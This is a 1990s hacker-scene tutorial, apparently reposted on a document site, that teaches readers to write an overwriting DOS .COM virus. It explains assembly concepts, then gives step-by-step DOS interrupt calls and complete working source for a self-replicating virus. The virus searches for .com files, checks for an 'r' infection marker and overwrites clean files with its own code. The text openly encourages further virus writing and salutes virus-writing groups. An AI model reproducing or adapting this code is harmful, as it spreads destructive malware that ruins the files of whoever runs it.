Sie sind auf Seite 1von 7

/\---/\ RATBOY'S OVER WRITTING VIRUS TUTORIAL #2

( . . )
\ / WARNING: Information Contained Within Can Eat Both Your
\ / ^^^^^^^ Mind, Hard Drive and your dog.
\*/ I assume no responsiblity!!!!!!
#
Hello everyone!!!! Considering I have gotten positive responses about
Ratboy#1 I decided to continue on with your lessions in simple viruses.
So what is in store for this issue? We will be going over some terms to
help us in this issue. Also, we will move on to more complex overwriting
.Com viruses. If you read and understood Ratboy#1, you should understand
how to due simple file operations. Such as, you need to open the victum
for reading and writing, and if you are a ATF agent you need to open the
file to shoot it in the back like it was one of your own agents. You will
read how to read from your file, write to it, "tag" it, and more helpful
example code to help with your further learning of viruses. :) Yea!!
Now the boreing parts:
What is a JMP (jump)?
A jump is kinda like what it sounds like, a jump. Since we know
that an assembly source reads top to bottom, sometimes we need to
skip around in a program depending on the situation. Here's a simple
example:
call delta_offset
delta_offset:
pop bp
sub bp,delta_offset
jmp restore ;<===this is a jump :)
eat_hd:
"blah"
"blah"
As you can see, in the example, we jumped over eat_hd and anything
else that was between the jump and restore. A real simple
explanation of how a jump works is like this. A jump when put
together by the assembler, well be converted to a jump without
the label but a displacement. Like this:
jmp anywhere
Really means jmp 45 bytes
As you can see the number is postive so it a foward jump (negative
would be backwards). Now I think I'm getting too far, I just wanted
you to understand it's a displacement. I'm not even going into
conditional jumps since I did say in the Ratboy#1 you do need to
understand Assembly. I know a lot of this should be old hat, but
bare with me for now. :)
I was recently asked what is a CALL?
A call is like a jump with a return address. When a Call is made,
the next line offset(address) is pushed into the stack, and a jump
to the place called is made. Once there, you can return by using
RET. This RET will pop the return address off the stack and jump
there.
Simple example:
mov al,02h
call mov_ptr ;<==the next line's address it put into
;the stack (that would be eat_hd) and a
;jump is made to mov_ptr
eat_hd:
"blah"
"blah"
"blah"
jmp exit ;<==simple review, how does this work?
mov-ptr:
"blah"
"blah"
"blah"
ret ;ah..now the return address(eat_hd) is
;popped off the stack and a jump is made
;to it
Another question was what is an OFFSET?
Since we are so far just dealing with .Com files make this real
simple. An offset is like an address. If you know where you live,
then you understand how and address works.
Simple Simple Example:
Where does Debby live?
Oh, on 16th St. and 5th Ave. (that is an example of an Offset)
Review:
Where does Debby live?
Oh, go down three blocks and the third house on the left.
(this is an example of a jump, see the displacement?)
Another question is what is LEA?
LEA stands for Load Effective Address. Yarn! Too technical. Here's
how it works. Remember in Ratboy#1 when looking for a file, you
needed to load the file type(*.com) offset into dx, like this:
mov dx,offset file_type
well you can do this instead:
lea dx,file_type
Nuff said. Practice with it, see its ranges of use.
Ok I know some one must have fallen asleep, if this bores you just go ahead
and read Dark Angel's Virus Writing Guides, maybe they are up to speed with
you.
How can I speed up my programs?
Simple, kinda think of speed as being the least amount of bytes
nessary for you to carry out the job.
example:
mov ax,0 ;3 bytes
sub ax,ax ;2 bytes
So which one would you figure to be the faster. I used sub ax,ax
since I don't want to even go into explaining XOR, but XOR AX,AX
will do the samethin. Do some reading up on it, you'll need it for
encryption later on in your virus writing carreer. The Sub should
make sense, subtract a number from itself = 0.
Also here's another way of putting what is AX in BX.
Instead of saying:
mov bx,ax ;2 bytes
say:
xchg bx,ax ;1 byte
Ya get it?
Now down to the exciting part of doing something. Yea!!!!
Ok in the last issue if you made your virus and you noticed that it infected
the first file and not any others, that's because it was real simple. This
time we will teach your little life form how to determine if the file is
already infected. Now how do you make sure you know which underwear are
your's at summer camp, your mom sewed your name inside of them. If you are
over 30 and your mom still does this, you are a geek. No arguements, you are
a Geek.
Ok, we need to put in, the infected file, some type of marker, so that we
can later read it. Let's keep this simple, since ofcourse that's the motive
of this tutorial. I will use the letter "r" for RaTBoY. We will put
that "infection marker" right after the jump. So it will kinda look like
this:
virus_start:
jmp find_first
me db 'r'
find_first:
"blah"
"blah"
Ya see it? Now we will go on. Since to do it all you have to do is put the
Me db 'r' in the front of your virus. Now we need to put that jump in
there, for the file to go over the 'r' and start looking for the file. All
the virus needs to do is read the first four bytes of a file, and check if
the 4th (jmp + offset = 3bytes) byte to identify if it's already infected.
Now let's look at the order of operations. For you english majors this is
outline. :)

(I) find file


(a)no files to infect...EXIT
(II) open file for reading
(III) read first four bytes
(IV) close file
(V) compare to id byte(infection marker)
(a) if infected already:
1. setup to find next file
2. goto step I
(b) if not infected continue on
(VI) open file for read/write
(VII) write self to file
(VIII) close file
(IX) exit
Now that should not be such a differcult virus to make. Some of this
material will be review for you and a chance to see if you can still
understand everything clearly.
-=Step I=-
~~~~~~
Now of course we need to find the first file. Here are the required inputs:
ah = 4eh
cx = atributes
dx = file type (ie. *.com)
int 21h
if the carry flag is set then there were no files, so if:
jc exit ;jump to exit if no files
not bad if you can remember this off the top of your head. I think I went
over this well enough in Ratboy#1, so not to bore you I go on.
-=Step II=-
~~~~~~~
Now we need to open that file to read and write to it. Inputs are:
ax = 3d00h ;remember the value of AL will setup
;for the access you want
;al = 00h(read only)
;al = 01h(write only)
;al = 02h(read/write)
dx = offset address of file name
int 21h
Returns:
ax = file handle (or error code..nah can't happen)
Now do you remember where we get that file name? Why of course you know
this, it's in the DTA. Now since we didn't mess with it, it should be
at 80h in the Program Segment Prefix (PSP). So if you know that and you've
read Ratboy#1 where do we look for the address of the file name?
That's right 9eh. Remember to put the file handle in BX where we will use it
later(ie. xchg bx,ax) Since we went over this in Ratboy#1 we'll go on.
-=Step III=-
~~~~~~~~
Now comes something new. We will read the first four bytes of the victum
file, and put it in our buffer, HOLDN_PLACE. Here's the function's inputs:
ah = 3fh
bx = file handle
cx = bytes to read
dx = offset of buffer(buffer = the place you put the read byte(s))
int 21h
Here's how it would look in your virus:
***Remember that at the end of step two we put the file handle in bx***
mov ah,3fh
mov cx,4
lea dx,holdn_place
int 21h
and ofcourse at the end to the virus:
holdn_place db ?,?,?,?
-=Step IV=-
~~~~~~~
Close up the file. So if it's infected, we just move on. If the file is not
infected, we open it up for read and write access. Inputs:
ax = 3eh
int 21h
Simple enough?
-=Step V=-
~~~~~~
Now we will compare the four bytes of the possible victum to the id byte.
cmp byte ptr [holdn_place +3],'r' ;told ya I would use a 'r'
jnz open_it_again ;if not same then time to infect
mov ah,4fh ;now we set up ah with 4fh(find next)
;we could use a whole new find file routine but we will
;use the the one from find first, just that now ah=4fh
;if that confused you read the source for the setup.
-=Step VI=-
~~~~~~~
Now since it passed the test of not being infected, just reopen it.
This time so we can write to it. :) Then inputs:
ax = 3d02h
dx = offset of file name
int 21h
Just to go over it one more time here's what it will look like:
mov ax,3d02h
mov dx,9eh ;That's where the file name is in the DTA
int 21h
xchg bx,ax ;remember to put that file handle in BX :)
-=Step VII=-
~~~~~~~~
Of course this write to victum part should be real old hat for ya, since
this is the part that seperates a lame trojan from a |< 00\_ virus.
write to file inputs:
ah = 40h(hey isn't that a magazine?)
cx = number of bytes to write(size of virus)
bx = file handle(victum)
dx = offset address of buffer(beginning of virus)
If unfamiliar with writing to file, just wait and look over the source at
the end of this file.
-=Step VIII=-
~~~~~~~~~
Close file....sorry if this is getting repetative, but that is the sign of
you learning how to do this real well. Inputs:
ah = 3eh
bx = file handle(victum)
-=Step IX=-
~~~~~~~
Exit. Here's a real easy way:
INT 20h
Well that is enough of that piece by piece construction. Let's look at the
finish part.
;Ratboy tutorial over writer #2 virus
code segment ;these part should look familar
assume cs:code,ds:code
org 100h
virus proc near
virus_start:
jmp find_first
db 'r' ;there's that id byte
find_first: ;load ah with 4eh for finding first
mov ah,4eh ;file like the file_type
find_file:
xor cx,cx ;this put a 0 in cx, remember? The 0
;means look for normal attributes
lea dx,file_type ;sets up for what type of file we're
;looking for, *.com
int 21h
jc exit ;no files, time to leave.
open_file:
mov ax,3d00h ;open file found for reading from.
mov dx,9eh ;the file name is in the DTA
int 21h
xchg bx,ax ;remember that ax will return with the file
;handle, and we need that is bx :)
read_file:
mov ah,3fh ;read file
mov cx,4 ;four bytes
lea dx,holdn_place ;that's where it's going.... ;)
int 21h
close_it_up:
mov ah,3eh ;just like it says
int 21h
compare:
cmp byte ptr[holdn_place + 3],'r' ;check if there is a 'r'
jnz open_it_up_again ;not there ok let's infect
mov ah,4fh ;ok let's setup to look for another file
jmp find_file ;ah..you see how we will be using find_file
;but this time ah=4fh not 4eh. See how it's
;different, but the same.
open_it_up_again:
mov ax,3d02h ;Alright, we have a live one here!!!!
mov dx,9eh ;let's get that file name again
int 21h
xchg bx,ax ;yup, once again.
infect:
mov ah,40h
mov cx,offset endvx - offset virus_start
;the end minus the beginning gives the lenth
;of the virus. #of bytes to write.
lea dx,virus_start ;the virus's begining so this tells where to
;to start writing from and bx contains the
;file handle, where to write to.
int 21h
close_victum:
mov ah,3eh ;now let's close up the victum
int 21h
exit: int 20h ;time to exit, later!!!
file_type db "*.com",0
holdn_place db ?,?,?,?
endvx label near
virus endp
code ends
end virus_start
I really do hope that this tutoral has been helpful to you. Remember if you
find this boring. Then you know enough write effective overwriting viruses,
and you should move on to other types of virus.
Now remember the best teacher in virus writer is yourself practicing. So if
you want to try something different, try it. Just don't do it in your DOS
directory. :)
Also Included with this file: sources to overwriters and Ratboy viruses.
You still need an Assembler, Bait files, a good reference book and not
to forget good people to ask a lot of dumb questions to. Like I do. :)
Of course that usual ending where I thank all those that have helped me:
-=GOD: I woke up breathing today. :)
-=Mrs. Ratboy: For putting up with me ;)
-=FC: For all the help dude!!!!!!!!!!!!
-=Aristotle: No Aristotle I didn't mean you when I said GOD, but Thanks.
-=M.P.: Love ya software, Invircible.
-=Thanks to these guys and groups: Virogen, Terminal Velocity, NuKE, Falcon,
Vlad, Immortal Riot, P/S, ACVR, and every virus writer I didn't mention!!!